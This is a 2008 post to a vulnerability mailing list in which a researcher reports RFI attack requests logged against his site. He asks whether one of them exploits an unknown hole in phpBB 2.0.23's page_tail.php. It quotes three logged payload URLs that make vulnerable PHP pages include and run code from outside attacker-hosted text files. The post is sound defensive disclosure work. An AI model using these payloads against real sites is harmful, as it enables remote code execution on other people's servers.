[VIM] RFI BotNet and phpBB 0-day?

security curmudgeon jericho at attrition.org
Thu Mar 20 10:04:39 UTC 2008


For a while i've noticed a ton of RFI requests made to attrition.org, the 
frequency and patterns suggest it's a large botnet possibly. I haven't had 
time to really dig into the logs and learn much about it. Tonight I saw 
one request come across and got curious how many of these requests were 
published vulnerabilities versus potential 0-day. Many requests don't have 
enough information to easily determine the software (e.g. 
/dir/index.php?id=http://), but this may:

/claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f

I don't see reference to "page_tail.php" in CVE or OSVDB. The directory 
structure suggests it is either in Claroline or phpBB though.

http://www.claroline.net/download/stable.html

Version 1.8.9 .tar has "page.php" and "pager.lib.php" but not the file 
above.

http://www.phpbb.com/downloads/

Version 2.0.23 ("legacy") has "page_tail.php" in it.

Version 3.0.0 (phpBB3) has no file by that name.

--

So, does anyone want to see if it is truly vulnerable? If so, we know it's 
phpBB 2.0.23 (and maybe prior), we know the file name and variable, and we 
know it is actively being exploited in the wild and discovered as a result 
of it.

Brian



p.s. While writing this, a full example of one that would be a tad harder 
to track down, but given the "com_comprofiler" and 
"mosConfig_absolute_path", shouldn't be that difficult:
/index.php?_REQUEST=&_REQUEST%5boption%5d=option,com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://test15.digitalis.com.pa/components/com_atom/id.txt%3f%3f

p.p.s. And an example of an older disclosed vulnerability being used:
/squirrelcart/cart_content.php?cart_isp_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
(CVE-2006-2483 / OSVDB 25523)


More information about the VIM mailing list